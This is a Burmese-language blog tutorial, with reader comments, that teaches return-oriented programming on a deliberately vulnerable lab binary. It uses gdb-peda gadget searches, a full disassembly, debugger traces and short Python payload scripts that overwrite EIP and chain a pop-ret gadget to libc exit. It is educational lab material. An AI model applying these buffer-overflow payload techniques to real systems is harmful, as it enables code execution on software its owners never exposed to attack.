0x0B -Undetstanding Return Oriented Programming

ROP ကို လုပ္ဖို႕ေကာင္းေကာင္းအဆင္ေျပသြားျပီလို႕ယူဆလိုက္ပါျပီ။ ဘာေၾကာင့္လဲဆို အေရွ႕က Post ထိ အစဥ္လိုက္လုပ္ခဲ့တဲ့သူဆိုရင္ေတာ့ ရပါတယ္ ။ ( Before you begin ROP )

ဒီတစ္ခါေတာ့ gdb peda ကိုသံုးမယ္ ။ ေနာက္ပိုင္းလဲ peda က အဆင္ပိုေျပမယ္ထင္ပါတယ္။

https://github.com/longld/peda

Installation က ပါျပီးသားပါ။

root@exploitdev:~/ROP# git clone https://github.com/longld/peda.git ~/peda
Cloning into '/root/peda'...
remote: Counting objects: 331, done.
remote: Total 331 (delta 0), reused 0 (delta 0), pack-reused 331
Receiving objects: 100% (331/331), 254.53 KiB | 134.00 KiB/s, done.
Resolving deltas: 100% (210/210), done.
Checking connectivity... done.
root@exploitdev:~/ROP# echo "source ~/peda/peda.py" >> ~/.gdbinit

ဘာလို႕ gdb peda ကိုခုမွထသံုးေနတာလဲဆိုရင္ က်ေနာ္တို႕ ROP gadgets ေတြကို peda ရဲ႕ အကူအညီနဲ႕ရွာခ်င္လို႕ျဖစ္ပါတယ္။ ROP gadgets ဆိုတာကေတာ့ Memory ထဲမွာရွိျပီးသား Instruction ေတြပဲျဖစ္ပါတယ္။ ဒီထဲမွာမွ အသံုးဝင္မယ့္ဟာေတြကို က်ေနာ္တို႕က ROP exploit အတြက္ျပန္သံုးမွာျဖစ္ပါတယ္။ဒီေတာ့ဘယ္လို Instruction ေတြဟာ ROP gadgets ေတြျဖစ္မွာလဲ

အရင္ဆံုး ၾကည့္မယ္ ။ ျပီးေတာ့မွ ပံုေတြဘာေတြဆြဲသင့္ဆြဲတာေပါ့ ။

အရင္ခန္းက Program ကိုပဲသံုးမွာျဖစ္ပါတယ္။

root@exploitdev:~/ROP# gdb rop_u
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from rop_u...(no debugging symbols found)...done.

အစကေနျပန္လုပ္ခ်င္ေတာ့လို႕ အရင္ program ကိုပဲယူသံုးတာျဖစ္ပါတယ္။

Peda မွာပါလာတဲ့ key features ေတြကလဲ ေတာ္ေတာ္အဆင္ေျပတယ္ ။ အခု program မွာ security ဘယ္လိုေတြထားထားလဲဆိုတာၾကည့္ခ်င္ရင္

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

CANARY တို႕ PIE တို႕ကို disabled လုပ္ထားတယ္။ NX ( Non Executable Stack ) တစ္ခုပဲရွိတယ္ ။က်န္တဲ့ Bypass ေတြကိုေနာက္မ်ားမွဆက္ေရးပါေတာ့မယ္ ။ Stack ကေန တျခားကိုသြားခ်င္လို႕ျဖစ္ပါတယ္

rop gadget ေတြမရွာခင္မွာ အရင္ဆံုး program ကို စလိုက္မယ္ memory က မ run ရင္ rop gadgets ေတြကလဲ ရွိမွာမဟုတ္ဘူး။

gdb-peda$ start
[----------------------------------registers-----------------------------------]
EAX: 0xf7fcadbc --> 0xffffd71c --> 0xffffd840 ("XDG_SESSION_ID=68")
EBX: 0x0
ECX: 0xffffd680 --> 0x1
EDX: 0xffffd6a4 --> 0x0
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0xffffd668 --> 0x0
ESP: 0xffffd664 --> 0xffffd680 --> 0x1
EIP: 0x8048427 (<main+14>:      sub    esp,0x14)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048423 <main+10>: push   ebp
   0x8048424 <main+11>: mov    ebp,esp
   0x8048426 <main+13>: push   ecx
=> 0x8048427 <main+14>: sub    esp,0x14
   0x804842a <main+17>: sub    esp,0xc
   0x804842d <main+20>: lea    eax,[ebp-0x18]
   0x8048430 <main+23>: push   eax
   0x8048431 <main+24>: call   0x80482e0 <gets@plt>
[------------------------------------stack-------------------------------------]
0000| 0xffffd664 --> 0xffffd680 --> 0x1
0004| 0xffffd668 --> 0x0
0008| 0xffffd66c --> 0xf7e31637 (<__libc_start_main+247>:       add    esp,0x10)
0012| 0xffffd670 --> 0xf7fc9000 --> 0x1afdb0
0016| 0xffffd674 --> 0xf7fc9000 --> 0x1afdb0
0020| 0xffffd678 --> 0x0
0024| 0xffffd67c --> 0xf7e31637 (<__libc_start_main+247>:       add    esp,0x10)
0028| 0xffffd680 --> 0x1
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Temporary breakpoint 1, 0x08048427 in main ()

ropgadget ကိုသံုးျပီးေတာ့ ရွာမယ္။

gdb-peda$ ropgadget
ret = 0x80482b2
popret = 0x80482c9
pop4ret = 0x80484a8
pop3ret = 0x80484a9
pop2ret = 0x80484aa
addesp_12 = 0x80482c6
addesp_16 = 0x8048375

ဒါေပမဲ့ ဘာေတြလဲ ?

root@exploitdev:~/ROP# objdump -d rop_u

rop_u:     file format elf32-i386


Disassembly of section .init:

080482a8 <_init>:
 80482a8:       53                      push   %ebx
 80482a9:       83 ec 08                sub    $0x8,%esp
 80482ac:       e8 8f 00 00 00          call   8048340 <__x86.get_pc_thunk.bx>
 80482b1:       81 c3 4f 1d 00 00       add    $0x1d4f,%ebx
 80482b7:       8b 83 fc ff ff ff       mov    -0x4(%ebx),%eax
 80482bd:       85 c0                   test   %eax,%eax
 80482bf:       74 05                   je     80482c6 <_init+0x1e>
 80482c1:       e8 3a 00 00 00          call   8048300 <__libc_start_main@plt+0x10>
 80482c6:       83 c4 08                add    $0x8,%esp
 80482c9:       5b                      pop    %ebx
 80482ca:       c3                      ret

Disassembly of section .plt:

080482d0 <gets@plt-0x10>:
 80482d0:       ff 35 04 a0 04 08       pushl  0x804a004
 80482d6:       ff 25 08 a0 04 08       jmp    *0x804a008
 80482dc:       00 00                   add    %al,(%eax)
        ...

080482e0 <gets@plt>:
 80482e0:       ff 25 0c a0 04 08       jmp    *0x804a00c
 80482e6:       68 00 00 00 00          push   $0x0
 80482eb:       e9 e0 ff ff ff          jmp    80482d0 <_init+0x28>

080482f0 <__libc_start_main@plt>:
 80482f0:       ff 25 10 a0 04 08       jmp    *0x804a010
 80482f6:       68 08 00 00 00          push   $0x8
 80482fb:       e9 d0 ff ff ff          jmp    80482d0 <_init+0x28>

Disassembly of section .plt.got:

08048300 <.plt.got>:
 8048300:       ff 25 fc 9f 04 08       jmp    *0x8049ffc
 8048306:       66 90                   xchg   %ax,%ax

Disassembly of section .text:

08048310 <_start>:
 8048310:       31 ed                   xor    %ebp,%ebp
 8048312:       5e                      pop    %esi
 8048313:       89 e1                   mov    %esp,%ecx
 8048315:       83 e4 f0                and    $0xfffffff0,%esp
 8048318:       50                      push   %eax
 8048319:       54                      push   %esp
 804831a:       52                      push   %edx
 804831b:       68 b0 84 04 08          push   $0x80484b0
 8048320:       68 50 84 04 08          push   $0x8048450
 8048325:       51                      push   %ecx
 8048326:       56                      push   %esi
 8048327:       68 19 84 04 08          push   $0x8048419
 804832c:       e8 bf ff ff ff          call   80482f0 <__libc_start_main@plt>
 8048331:       f4                      hlt
 8048332:       66 90                   xchg   %ax,%ax
 8048334:       66 90                   xchg   %ax,%ax
 8048336:       66 90                   xchg   %ax,%ax
 8048338:       66 90                   xchg   %ax,%ax
 804833a:       66 90                   xchg   %ax,%ax
 804833c:       66 90                   xchg   %ax,%ax
 804833e:       66 90                   xchg   %ax,%ax

08048340 <__x86.get_pc_thunk.bx>:
 8048340:       8b 1c 24                mov    (%esp),%ebx
 8048343:       c3                      ret
 8048344:       66 90                   xchg   %ax,%ax
 8048346:       66 90                   xchg   %ax,%ax
 8048348:       66 90                   xchg   %ax,%ax
 804834a:       66 90                   xchg   %ax,%ax
 804834c:       66 90                   xchg   %ax,%ax
 804834e:       66 90                   xchg   %ax,%ax

08048350 <deregister_tm_clones>:
 8048350:       b8 1f a0 04 08          mov    $0x804a01f,%eax
 8048355:       2d 1c a0 04 08          sub    $0x804a01c,%eax
 804835a:       83 f8 06                cmp    $0x6,%eax
 804835d:       76 1a                   jbe    8048379 <deregister_tm_clones+0x29>
 804835f:       b8 00 00 00 00          mov    $0x0,%eax
 8048364:       85 c0                   test   %eax,%eax
 8048366:       74 11                   je     8048379 <deregister_tm_clones+0x29>
 8048368:       55                      push   %ebp
 8048369:       89 e5                   mov    %esp,%ebp
 804836b:       83 ec 14                sub    $0x14,%esp
 804836e:       68 1c a0 04 08          push   $0x804a01c
 8048373:       ff d0                   call   *%eax
 8048375:       83 c4 10                add    $0x10,%esp
 8048378:       c9                      leave
 8048379:       f3 c3                   repz ret
 804837b:       90                      nop
 804837c:       8d 74 26 00             lea    0x0(%esi,%eiz,1),%esi

08048380 <register_tm_clones>:
 8048380:       b8 1c a0 04 08          mov    $0x804a01c,%eax
 8048385:       2d 1c a0 04 08          sub    $0x804a01c,%eax
 804838a:       c1 f8 02                sar    $0x2,%eax
 804838d:       89 c2                   mov    %eax,%edx
 804838f:       c1 ea 1f                shr    $0x1f,%edx
 8048392:       01 d0                   add    %edx,%eax
 8048394:       d1 f8                   sar    %eax
 8048396:       74 1b                   je     80483b3 <register_tm_clones+0x33>
 8048398:       ba 00 00 00 00          mov    $0x0,%edx
 804839d:       85 d2                   test   %edx,%edx
 804839f:       74 12                   je     80483b3 <register_tm_clones+0x33>
 80483a1:       55                      push   %ebp
 80483a2:       89 e5                   mov    %esp,%ebp
 80483a4:       83 ec 10                sub    $0x10,%esp
 80483a7:       50                      push   %eax
 80483a8:       68 1c a0 04 08          push   $0x804a01c
 80483ad:       ff d2                   call   *%edx
 80483af:       83 c4 10                add    $0x10,%esp
 80483b2:       c9                      leave
 80483b3:       f3 c3                   repz ret
 80483b5:       8d 74 26 00             lea    0x0(%esi,%eiz,1),%esi
 80483b9:       8d bc 27 00 00 00 00    lea    0x0(%edi,%eiz,1),%edi

080483c0 <__do_global_dtors_aux>:
 80483c0:       80 3d 1c a0 04 08 00    cmpb   $0x0,0x804a01c
 80483c7:       75 13                   jne    80483dc <__do_global_dtors_aux+0x1c>
 80483c9:       55                      push   %ebp
 80483ca:       89 e5                   mov    %esp,%ebp
 80483cc:       83 ec 08                sub    $0x8,%esp
 80483cf:       e8 7c ff ff ff          call   8048350 <deregister_tm_clones>
 80483d4:       c6 05 1c a0 04 08 01    movb   $0x1,0x804a01c
 80483db:       c9                      leave
 80483dc:       f3 c3                   repz ret
 80483de:       66 90                   xchg   %ax,%ax

080483e0 <frame_dummy>:
 80483e0:       b8 10 9f 04 08          mov    $0x8049f10,%eax
 80483e5:       8b 10                   mov    (%eax),%edx
 80483e7:       85 d2                   test   %edx,%edx
 80483e9:       75 05                   jne    80483f0 <frame_dummy+0x10>
 80483eb:       eb 93                   jmp    8048380 <register_tm_clones>
 80483ed:       8d 76 00                lea    0x0(%esi),%esi
 80483f0:       ba 00 00 00 00          mov    $0x0,%edx
 80483f5:       85 d2                   test   %edx,%edx
 80483f7:       74 f2                   je     80483eb <frame_dummy+0xb>
 80483f9:       55                      push   %ebp
 80483fa:       89 e5                   mov    %esp,%ebp
 80483fc:       83 ec 14                sub    $0x14,%esp
 80483ff:       50                      push   %eax
 8048400:       ff d2                   call   *%edx
 8048402:       83 c4 10                add    $0x10,%esp
 8048405:       c9                      leave
 8048406:       e9 75 ff ff ff          jmp    8048380 <register_tm_clones>

0804840b <add>:
 804840b:       55                      push   %ebp
 804840c:       89 e5                   mov    %esp,%ebp
 804840e:       8b 45 0c                mov    0xc(%ebp),%eax
 8048411:       01 45 08                add    %eax,0x8(%ebp)
 8048414:       8b 45 08                mov    0x8(%ebp),%eax
 8048417:       5d                      pop    %ebp
 8048418:       c3                      ret

08048419 <main>:
 8048419:       8d 4c 24 04             lea    0x4(%esp),%ecx
 804841d:       83 e4 f0                and    $0xfffffff0,%esp
 8048420:       ff 71 fc                pushl  -0x4(%ecx)
 8048423:       55                      push   %ebp
 8048424:       89 e5                   mov    %esp,%ebp
 8048426:       51                      push   %ecx
 8048427:       83 ec 14                sub    $0x14,%esp
 804842a:       83 ec 0c                sub    $0xc,%esp
 804842d:       8d 45 e8                lea    -0x18(%ebp),%eax
 8048430:       50                      push   %eax
 8048431:       e8 aa fe ff ff          call   80482e0 <gets@plt>
 8048436:       83 c4 10                add    $0x10,%esp
 8048439:       b8 00 00 00 00          mov    $0x0,%eax
 804843e:       8b 4d fc                mov    -0x4(%ebp),%ecx
 8048441:       c9                      leave
 8048442:       8d 61 fc                lea    -0x4(%ecx),%esp
 8048445:       c3                      ret
 8048446:       66 90                   xchg   %ax,%ax
 8048448:       66 90                   xchg   %ax,%ax
 804844a:       66 90                   xchg   %ax,%ax
 804844c:       66 90                   xchg   %ax,%ax
 804844e:       66 90                   xchg   %ax,%ax

08048450 <__libc_csu_init>:
 8048450:       55                      push   %ebp
 8048451:       57                      push   %edi
 8048452:       56                      push   %esi
 8048453:       53                      push   %ebx
 8048454:       e8 e7 fe ff ff          call   8048340 <__x86.get_pc_thunk.bx>
 8048459:       81 c3 a7 1b 00 00       add    $0x1ba7,%ebx
 804845f:       83 ec 0c                sub    $0xc,%esp
 8048462:       8b 6c 24 20             mov    0x20(%esp),%ebp
 8048466:       8d b3 0c ff ff ff       lea    -0xf4(%ebx),%esi
 804846c:       e8 37 fe ff ff          call   80482a8 <_init>
 8048471:       8d 83 08 ff ff ff       lea    -0xf8(%ebx),%eax
 8048477:       29 c6                   sub    %eax,%esi
 8048479:       c1 fe 02                sar    $0x2,%esi
 804847c:       85 f6                   test   %esi,%esi
 804847e:       74 25                   je     80484a5 <__libc_csu_init+0x55>
 8048480:       31 ff                   xor    %edi,%edi
 8048482:       8d b6 00 00 00 00       lea    0x0(%esi),%esi
 8048488:       83 ec 04                sub    $0x4,%esp
 804848b:       ff 74 24 2c             pushl  0x2c(%esp)
 804848f:       ff 74 24 2c             pushl  0x2c(%esp)
 8048493:       55                      push   %ebp
 8048494:       ff 94 bb 08 ff ff ff    call   *-0xf8(%ebx,%edi,4)
 804849b:       83 c7 01                add    $0x1,%edi
 804849e:       83 c4 10                add    $0x10,%esp
 80484a1:       39 f7                   cmp    %esi,%edi
 80484a3:       75 e3                   jne    8048488 <__libc_csu_init+0x38>
 80484a5:       83 c4 0c                add    $0xc,%esp
 80484a8:       5b                      pop    %ebx
 80484a9:       5e                      pop    %esi
 80484aa:       5f                      pop    %edi
 80484ab:       5d                      pop    %ebp
 80484ac:       c3                      ret
 80484ad:       8d 76 00                lea    0x0(%esi),%esi

080484b0 <__libc_csu_fini>:
 80484b0:       f3 c3                   repz ret

Disassembly of section .fini:

080484b4 <_fini>:
 80484b4:       53                      push   %ebx
 80484b5:       83 ec 08                sub    $0x8,%esp
 80484b8:       e8 83 fe ff ff          call   8048340 <__x86.get_pc_thunk.bx>
 80484bd:       81 c3 43 1b 00 00       add    $0x1b43,%ebx
 80484c3:       83 c4 08                add    $0x8,%esp
 80484c6:       5b                      pop    %ebx
 80484c7:       c3                      ret

ဒါက Objdump နဲ႕ထုတ္ထားတဲ့ diassembly ျဖစ္တယ္။ ropgadget ကဘာေတြကိုရွာေပးတာလဲ ဆိုတာသိေအာင္ ေအာက္ကပံုေလးကိုၾကည့္လိုက္ပါ ။ အေပၚဆံုးက ret ကိုေတာ့ ခဏထားလိုက္မယ္ ။ တစ္ခုတည္းမလို႕ ။

popret = 0x80482c9 ေလးဆိုပါေတာ့

ROP gadget ေတြမွာ အျမဲတမ္း ret နဲ႕ဆံုးတာကိုေတြ႕ရလိမ့္မယ္။ ဘာေၾကာင့္လဲဆိုရင္ ret က stack ရဲ႕အေပၚဆံုးက value ကို EIP အျဖစ္နဲ႕ယူမဲ့ instruction ျဖစ္လို႕ပါပဲ ။ ဒီလိုဆိုရင္ stack ဆီကိုသြားတာမဟုတ္ေတာ့ဘူး ။ ဒီေတာ့ ROP gadget ေတြရွာေပးတဲ့ command ရဲ႕အသံုးဝင္ပံုကိုသိျပီ ။ ROP ကို သိဖို႕ပဲက်န္ေတာ့တယ္။

ျပီးခဲ့တဲ့အခန္းက ဒီ program မွာ EIP ကို control လုပ္ခဲ့တဲ့ python code က ေအာက္ပါအတိုင္းျဖစ္တယ္

import struct
offset="AAAABBBBCCCCDDDDEEEE"
newesp=struct.pack("I",0xffffd650+0x4)
padding="GGGGHHHHIIIIJJJJKKKK"
print offset+newesp+padding

ဒီေတာ့ လုပ္ခ်င္တာကေတာ့အရင္လို Stack ေပၚကိုျပန္မသြားခ်င္တာျဖစ္တယ္။ ဒီေတာ့ ROP ကိုသံုးမယ္ pop return အတြက္ address ကလဲရွိေနျပီဆိုေတာ့ စမ္းလိုက္ၾကတာေပါ့ ။

import struct
eip=struct.pack("I",0x80482c9)
offset="BBBBCCCCDDDDEEEE"
newesp=struct.pack("I",0xffffd650+0x4)
padding="GGGGHHHHIIIIJJJJKKKK"
print eip+offset+newesp+padding

ထံုးစံအတိုင္း main မွာ break မယ္ peda ကေတာ့ မိုက္တယ္ ။ hook-stop ေတြဘာေတြလဲမလိုဘူး ။ ဒီအတြက္သီးသန္႕လုပ္ထားတာျဖစ္တဲ့အတြက္ လုပ္ထားျပီးသားျဖစ္တာေပါ့။

gdb-peda$ disas main
Dump of assembler code for function main:
   0x08048419 <+0>:     lea    ecx,[esp+0x4]
   0x0804841d <+4>:     and    esp,0xfffffff0
   0x08048420 <+7>:     push   DWORD PTR [ecx-0x4]
   0x08048423 <+10>:    push   ebp
   0x08048424 <+11>:    mov    ebp,esp
   0x08048426 <+13>:    push   ecx
=> 0x08048427 <+14>:    sub    esp,0x14
   0x0804842a <+17>:    sub    esp,0xc
   0x0804842d <+20>:    lea    eax,[ebp-0x18]
   0x08048430 <+23>:    push   eax
   0x08048431 <+24>:    call   0x80482e0 <gets@plt>
   0x08048436 <+29>:    add    esp,0x10
   0x08048439 <+32>:    mov    eax,0x0
   0x0804843e <+37>:    mov    ecx,DWORD PTR [ebp-0x4]
   0x08048441 <+40>:    leave
   0x08048442 <+41>:    lea    esp,[ecx-0x4]
   0x08048445 <+44>:    ret
End of assembler dump.
gdb-peda$ break *main+44
Breakpoint 2 at 0x8048445

Ok ခုန python က ထြက္လာတဲ့ ဟာေလး input အေနနဲ႕ run မယ္

gdb-peda$ r < rpo.txt
Starting program: /root/ROP/rop_u < rpo.txt
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd654 ("BBBBCCCCDDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
EDX: 0xf7fca87c --> 0x0
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0x47474747 ('GGGG')
ESP: 0xffffd650 --> 0x80482c9 (<_init+33>:      pop    ebx)
EIP: 0x8048445 (<main+44>:      ret)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804843e <main+37>: mov    ecx,DWORD PTR [ebp-0x4]
   0x8048441 <main+40>: leave
   0x8048442 <main+41>: lea    esp,[ecx-0x4]
=> 0x8048445 <main+44>: ret
   0x8048446:   xchg   ax,ax
   0x8048448:   xchg   ax,ax
   0x804844a:   xchg   ax,ax
   0x804844c:   xchg   ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xffffd650 --> 0x80482c9 (<_init+33>:     pop    ebx)
0004| 0xffffd654 ("BBBBCCCCDDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0008| 0xffffd658 ("CCCCDDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0012| 0xffffd65c ("DDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0016| 0xffffd660 ("EEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0020| 0xffffd664 --> 0xffffd654 ("BBBBCCCCDDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0024| 0xffffd668 ("GGGGHHHHIIIIJJJJKKKK")
0028| 0xffffd66c ("HHHHIIIIJJJJKKKK")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x08048445 in main ()

main ရဲ႕ RET ကိုေတာ့ေရာက္ျပီ ။ Stack ရဲ႕အေပၚဆံုးမွာကလဲ pop ebx ဆိုေတာ့ popret ကိုသြားမွာျဖစ္တယ္။ ဒီေတာ့ stack ထဲကိုျပန္သြားတာမဟုတ္ေတာ့ဘူးေပါ့ ။

gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd654 ("BBBBCCCCDDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
EDX: 0xf7fca87c --> 0x0
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0x47474747 ('GGGG')
ESP: 0xffffd654 ("BBBBCCCCDDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
EIP: 0x80482c9 (<_init+33>:     pop    ebx)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80482bf <_init+23>:        je     0x80482c6 <_init+30>
   0x80482c1 <_init+25>:        call   0x8048300
   0x80482c6 <_init+30>:        add    esp,0x8
=> 0x80482c9 <_init+33>:        pop    ebx
   0x80482ca <_init+34>:        ret
   0x80482cb:   add    BYTE PTR [eax],al
   0x80482cd:   add    BYTE PTR [eax],al
   0x80482cf:   add    bh,bh
[------------------------------------stack-------------------------------------]
0000| 0xffffd654 ("BBBBCCCCDDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0004| 0xffffd658 ("CCCCDDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0008| 0xffffd65c ("DDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0012| 0xffffd660 ("EEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0016| 0xffffd664 --> 0xffffd654 ("BBBBCCCCDDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0020| 0xffffd668 ("GGGGHHHHIIIIJJJJKKKK")
0024| 0xffffd66c ("HHHHIIIIJJJJKKKK")
0028| 0xffffd670 ("IIIIJJJJKKKK")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080482c9 in _init ()

pop ebx ကိုလုပ္ေတာ့မွာျဖစ္တယ္ ဒါဆိုရင္ BBBB ေတြက ebx ကိုေရာက္ေတာ့မွာေပါ့ ။

gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x42424242 ('BBBB')
ECX: 0xffffd654 ("BBBBCCCCDDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
EDX: 0xf7fca87c --> 0x0
ESI: 0xf7fc9000 --> 0x1afdb0
EDI: 0xf7fc9000 --> 0x1afdb0
EBP: 0x47474747 ('GGGG')
ESP: 0xffffd658 ("CCCCDDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
EIP: 0x80482ca (<_init+34>:     ret)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80482c1 <_init+25>:        call   0x8048300
   0x80482c6 <_init+30>:        add    esp,0x8
   0x80482c9 <_init+33>:        pop    ebx
=> 0x80482ca <_init+34>:        ret
   0x80482cb:   add    BYTE PTR [eax],al
   0x80482cd:   add    BYTE PTR [eax],al
   0x80482cf:   add    bh,bh
   0x80482d1:   xor    eax,0x804a004
[------------------------------------stack-------------------------------------]
0000| 0xffffd658 ("CCCCDDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0004| 0xffffd65c ("DDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0008| 0xffffd660 ("EEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0012| 0xffffd664 --> 0xffffd654 ("BBBBCCCCDDDDEEEET\326\377\377GGGGHHHHIIIIJJJJKKKK")
0016| 0xffffd668 ("GGGGHHHHIIIIJJJJKKKK")
0020| 0xffffd66c ("HHHHIIIIJJJJKKKK")
0024| 0xffffd670 ("IIIIJJJJKKKK")
0028| 0xffffd674 ("JJJJKKKK")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080482ca in _init ()

ခုေတာ့ ret ကိုေရာက္ျပီ CCCC ဟာ new eip ကိုထည့္ရမယ့္ Address ပဲျဖစ္ပါတယ္။ ပံုေလးနဲ႕ျပမယ္။

အိုေက ဒီေတာ့ဘယ္သြားျပီးဘာေတြလုပ္မွာလဲ?

exit ကိုပဲအရင္ဆံုးသြားၾကည့္လိုက္မယ္။

gdb-peda$ p exit
$6 = {<text variable, no debug info>} 0xf7e477b0 <exit>

ဒီေတာ့ က်ေနာ္တို႕ရဲ႕ new eip ကို exit ကိုပဲသြားခုိင္းလိုက္မယ္။

import struct

eip=struct.pack("I",0x80482c9)
junk1="BBBB"
neweip=struct.pack("I",0xf7e477b0)
junk2="DDDDEEEE"
newesp=struct.pack("I",0xffffd610+0x4)
#newesp="FFFF"
padding="GGGGHHHHIIIIJJJJKKKK"

print eip+junk1+neweip+junk2+newesp+padding

Result

[Inferior 1 (process 14959) exited with code 0105]

ဒါကေတာ့ထြက္သြားယံုေလးပဲေပါ့ ။ ဒီေလာက္ဆို ROP ကိုနားလည္ျပီလို႕ထင္ပါတယ္။

http://ropshell.com/
https://github.com/JonathanSalwan/ROPgadge

5 Comments

  1. compile လုပ္ထားတဲ့ binary ေလးပါ တစ္ခါထဲ upload တင္ေပးရင္ ပိုေကာင္းမယ္ဗ်။
    က်ြန္ေတာ္ စက္မွာ ရွိတဲ့ gcc compiler ေတြနဲ့ လုပ္ျကည့္ေတာ့ အဆင္မေျပဘူးျဖစ္ေနလို့ပါ။
    https://s31.postimg.org/drneo1r4r/rop_u.png
    Thanks For Sharing Bro!

    • Bro ၾကံုေနရတဲ့ ျပသနာကို က်ေနာ္ၾကံဳဖူးပါတယ္ 😀 Compile binary
      တင္ေပးလိုက္ရင္ Bro ၾကံဳရမွာမဟုတ္ေတာ့ဘူး ။ အခုျပသနာက
      Bro ရဲ႕ main function ကို disas လုပ္ထားတဲ့အခါ leave မပါဘူး ။
      အဲ့ဒါကို ေျဖရွင္းခ်င္ရင္ -mpreferred-stack-boundary=2 ထားလိုက္ရင္ရပါတယ္
      တစ္ခုအၾကံေပးခ်င္တာက Before you begin ROP ကို bro ေသခ်ာရရင္
      leave မပါလဲ ret ကိုေရာက္တာနဲ႕ ဘာလုပ္လဲေသခ်ာၾကည့္ျပီး eip ကို control လုပ္လို႕ရပါေသးတယ္

      နားလည္ေအာင္ၾကိဳးစားေစခ်င္ပါတယ္။ တစ္ခုခုကို ျပီးသြားတာထက္ နားလည္သြားတာကို
      က်ေနာ္ေတာ့ပိုသေဘာက်တယ္။ Thanks for question

      • ဟုတ္ အကို။
        က်ြန္ေတာ္ ဆိုလိုခ်င္တဲ့ သေဘာက
        ဒီ tutorial ကိုေလ့လာတယ္ ဒီ source code နဲ့ ပဲ၊
        ဒါကို compile လုပ္လိုက္တဲ့ အခါက်ေတာ့ asm instructions set ေတြကမတူေတာ့ဘူး။
        က်ြန္ေတာ္ တို့လို အခုမွ စေလ့လာတဲ့ သူေတြက်ေတာ့ ဘာလုပ္ရမွန္းမသိေတာ့ ဘူး။
        အကိုရဲ့ tutorial ကိုဖတ္တယ္ ျပီးေတာ့ က်ြန္ေတာ့ ရဲ့ binary file နဲ့စမ္းတယ္၊
        asm instruction ေတြ က မတူဘူး အဲ့လို့ုျဖစ္သြားတာ။ အဲ့ေတာ့ gdb ရဲ့ break point ေတြလဲ မတူေတာ့ဘူး။ memory address ေတြလဲ မတူေတာ့ဘူး။
        အစကေတာ့ ေျကာင့္သြားတာေပါ့ os ေျကာင့္လား, c compiler ေျကာင့္လား, gdb ေျကာင့္လား, etc ဆုိျပီးေတြးေနတာ။
        Reply ျပန္ေပးတဲ့ အတြက္လဲ ေက်းဇူးတင္ပါတယ္ အကို။
        က်ြန္ေတာ္ လဲ ျကိုးစားျပီးေလ့လာေနပါတယ္။ 😀

        • Compiler ေၾကာင့္ Compile option ေတြေရာ OS ေၾကာင့္ေရာ gdb နဲ႕ေတာ့မဆိုင္ဘူးေပါ့ ။
          က်ေနာ္ကေလာေလာဆယ္ Ubuntu နဲ႕လုပ္ေနတာ။ စမ္းတဲ့အခါ ဘာေတြပဲျဖစ္ျဖစ္က်ေနာ္႕ကိုလာေမးနိုင္ပါတယ္။ က်ေနာ္လဲ အဲ့လိုေတြျဖစ္ရင္ လိုက္ေမးတာပါ။ က်ေနာ္တို႕ အဲ့လိုေတြၾကံဳရေလ သိေလပဲ ။ ဘာ error မွ မတက္ခ်င္ရင္ေတာ့ bro protostar ကို သံုးျပီးေလ့လာေပါ့။ အဲဒါက အားလံုးလုပ္ထားျပီးသား 😀

Comments are closed.